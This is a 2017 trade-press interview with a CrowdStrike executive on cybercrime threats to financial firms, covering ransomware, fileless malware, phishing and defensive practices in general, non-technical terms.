CrowdStrike VP Q&A on cybercrime and financial services

By Alex Hammond | 25 April 2017

bobsguide's exclusive interview with Mike East, Vice President EMEA at CrowdStrike.

Who or what currently poses the greatest threat to the digital security of a financial services company?

Financial institutions remain a top target for cybercriminals. Today’s hackers - be they criminal or state-sponsored actors - target all financial organisations, regardless of size, and this can be via fast-evolving attack types such as ransomware. We’re also seeing a growth of “fileless malware” which is much harder to track through a corporate network and significantly limits the effectiveness of traditional antivirus software. Things like Powershell and administrative tools are being used to maintain persistence on systems to allow remote access by adversaries. It resides in memory and doesn’t ever land on the hard drive.

Has this threat been constant previously and will it continue to pose the greatest issue moving forward?

Since its emergence in 2005, the ransomware threat has now morphed into a devastatingly effective weapon wielded by a vast e-crime ecosystem, targeting organisations in almost every sector.

The fact that most enterprises lack sufficient defences, has attracted a more advanced breed of cyber criminal. The adversaries who develop ransomware have become so sophisticated that many of them are offering ransomware-as-a-service, giving their less knowledgeable counterparts access to the latest exploit kits and in turn widening the pool of potential victims.

Is there a method that financial services firms can employ to ascertain where the next likely attack might come from and what it will look like? Or is it a case of always having to be proactive?

Firms must be poised to assess what tools criminals are using for exploitation; understand how they have managed to propagate the network, and then determine next steps once a presence has been established.

Enabling this kind of security posture starts with expanding the scope of operations, using technologies that can identify indicators of attack (IoAs). This enables teams to track the effects of what the adversary is trying to accomplish, so that they can understand where the adversary has been, what its objectives are, and where it is today.

Organisations need to be continually and proactively assessing their networks to understand how they are compromised. Too many are focusing on the “known” bads, rather than trying to understand the threat of the “unknown.”

Can technology alone defend financial services firms against cybercriminals? Or do you have to fight human intelligence with human intelligence?

Investing in next-generation technologies may stop the more sophisticated attacks, but this is all in vain if an employee makes a mistake and gets caught by something like a phishing email. Unfortunately, it’s the easy stuff that gets companies. Whether it’s a cybercriminal or a nation state, phishing emails and social engineering is where they always start

Being able to assess any intrusion and contain it immediately is the only way to future-proof your business. A combination of intelligence and trained personnel is critical to ensure that no matter where the bad guys move, or whatever new tactics they deploy, a business can monitor these movements and be prepared to act.

What are the latest trends that you have seen in the ways criminals are evolving their cybercrime strategies?

We are seeing tradecraft that has traditionally been adopted by the most sophisticated, well-resourced adversaries move down the food chain. This will pose a major threat to businesses as eCrime actors will be able to capitalise on advanced intrusion methods. We are already seeing this trend unfold with new age attacks like ransomware and Mirai-based botnets that will likely continue to be easily accessible, and therefore, spread widely.

In general terms, are financial services winning the war against cybercrime? How can this be measured?

The Tesco Bank hack last year showed that even big organisations can fall victim to hackers and that when attacks are successful, it is highly likely customer funds will be stolen. The GDPR breach notification obligations will likely unveil a higher volume of hacks than we witness today, as well as more details about their impact.

More recently financial organisations have started to undertake fire drill exercises and stress tests. Sometimes this originates from the legal department and sometimes the CISO and often comprises of small quarterly drills followed by a big annual one. This results in a report which presents actionable insights into areas of strength and weakness. These processes will help determine how financial services organisations are faring.

What are CrowdStrike’s major objectives?

CrowdStrike was founded to fix a fundamental problem. The sophisticated attacks that were forcing the world’s leading businesses into the headlines could not be solved with existing malware-based defences. Co-founders George Kurtz and Dmitri Alperovitch realised that a brand-new approach was needed — one that combines the most advanced endpoint protection with expert intelligence to pinpoint the adversaries perpetrating the attacks, not just the malware. When all said, and done, CrowdStrike’s mission is simple: to stop breaches.